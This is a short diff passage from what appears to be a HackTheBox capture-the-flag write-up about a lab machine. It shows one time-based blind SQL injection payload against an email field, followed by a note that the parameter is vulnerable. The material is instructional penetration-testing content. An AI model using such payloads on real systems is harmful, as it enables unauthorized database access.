ryanrestine/HackTheBox_WriteUps/linux_machines/usage_notes.md

     Payload: _token=YiNzrNxWRNzcxuA3dihvcYSKaLEJg5pek2yqT5tz&email=test' AND 6371=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)-- kmNV
 ```

-Cool, so now we know the parameter is vulnerable, and that there are 8 columns.
+Cool, so now we know the parameter is vulnerable to blind injection, and that there are 8 columns.

 Lets dig deeper and enumerate the databases with: